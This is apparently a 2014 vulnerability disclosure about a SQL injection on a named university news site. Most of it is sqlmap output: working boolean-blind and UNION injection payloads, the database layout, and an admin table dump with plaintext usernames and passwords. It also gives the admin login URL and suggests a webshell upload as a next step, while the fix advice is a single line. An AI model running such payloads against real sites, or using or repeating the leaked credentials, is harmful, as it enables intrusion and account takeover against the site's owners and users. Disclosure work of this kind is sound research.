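2014-11-24: Details reported to the vendor; awaiting vendor handling.
2014-11-29: The vendor actively ignored the vulnerability; details disclosed to the public.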
RT
Injection point:
http://jnnews.jnu.edu.cn/qiandao/AttendList.asp?id=292 --tables
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=183 AND 7979=7979

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8197 UNION ALL SELECT CHR(113)&CHR(98)&CHR(106)&CHR(112)&CHR(113)&CHR(98)&CHR(101)&CHR(116)&CHR(65)&CHR(76)&CHR(104)&CHR(114)&CHR(85)&CHR(101)&CHR(77)&CHR(113)&CHR(118)&CHR(98)&CHR(122)&CHR(113),NULL,NULL FROM MSysAccessObjects%16
---
[00:22:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[00:22:23] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[00:22:25] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[00:22:25] [INFO] retrieved:
[00:22:28] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[00:22:28] [ERROR] cannot retrieve table names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
[1 table]
+-------+
| admin |
+-------+

Database: Microsoft_Access_masterdb
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| data     | non-numeric |
| id       | numeric     |
| passwd   | non-numeric |
| username | non-numeric |
+----------+-------------+

Database: Microsoft_Access_masterdb
Table: admin
[2 entries]
+----+---------+-------------+---------------+
| id | data    | passwd      | username      |
+----+---------+-------------+---------------+
| 26 | <blank> | xcb85228862 | liangbinadmin |
| 29 | <blank> | wenhuasuzhi | wehhuasuzhi   |
+----+---------+-------------+---------------+
Log in with the accounts above:
http://jnnews.jnu.edu.cn/qiandao/index2.asp
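Since it is IIS 6.0, it should be possible to upload a webshell; I'll stop here.
Filter input and change the passwords.
Severity: no impact, ignored by vendor
Ignored at: 2014-11-29 15:48
None yet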